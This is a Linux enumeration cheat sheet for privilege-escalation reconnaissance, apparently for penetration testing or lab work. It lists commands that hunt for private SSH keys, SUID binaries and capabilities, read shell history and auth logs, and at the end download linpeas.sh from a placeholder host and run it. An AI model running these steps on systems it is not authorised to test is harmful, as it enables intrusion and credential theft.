Linux basic enumeration cheatsheet:
Systeminfo:
hostname # Show the hostname of the machine
uname -a # Display kernel and system information
cat /etc/os-release # Identify the Linux distribution and version
id # Show current user ID and group memberships
whoami # Print the current username
pwd # Show the current working directory
Users and groups:
cat /etc/passwd # List local user accounts
cat /etc/group # List local groups
last # Show recent login history
w # Display logged-in users and their activity
sudo -l # Show allowed sudo commands for the current user
Interesting files:
find / -type f -name "*.conf" 2>/dev/null | head # Find configuration files and show first results
find / -perm -4000 2>/dev/null # Find SUID binaries
find / -writable -type d 2>/dev/null # Find writable directories
find / -name id_rsa 2>/dev/null # Search for private SSH keys
find / -name authorized_keys 2>/dev/null # Search for authorized SSH keys
Processes and services:
ps aux # List running processes
ss -tulpn # Show listening TCP/UDP ports and processes
netstat -tulpn # Another way to list ports and services
systemctl list-units --type=service # List active systemd services
Scheduled tasks:
crontab -l # Show current user's cron jobs
ls -la /etc/cron* # List system-wide cron directories and files
cat /etc/crontab # View the main system crontab
Environment and history:
env # Print environment variables
history # Show current shell command history
cat ~/.bash_history # Read bash history file manually
Network:
ip a # Show network interfaces and IP addresses
ip r # Show routing table
arp -a # Show ARP cache entries
cat /etc/hosts # View local hostname mappings
cat /etc/resolv.conf # View configured DNS servers
Permissions and sudo:
sudo -l # Check sudo permissions
sudo --version # Print sudo version
getcap -r / 2>/dev/null # Find binaries with Linux capabilities
ls -la /home # List home directories and permissions
Logs:
journalctl # View systemd journal logs
journalctl -xe # View recent logs with extra detail
cat /var/log/auth.log # Read auth logs on Debian-based systems
cat /var/log/syslog # Read general logs on Debian-based systems
Installed software:
dpkg -l # List installed packages on Debian-based systems
rpm -qa # List installed packages on RPM-based systems
snap list # List installed snap packages
Quick manual PE checks:
find / -perm -4000 2>/dev/null # Look for SUID binaries
getcap -r / 2>/dev/null # Look for binaries with special capabilities
Linpeas:
curl http://<IP>/linpeas.sh --output linpeas.sh # Download linpeas from hosting server
chmod +x linpeas.sh # Make it executable
./linpeas.sh # Launch linpeas enumeration Tool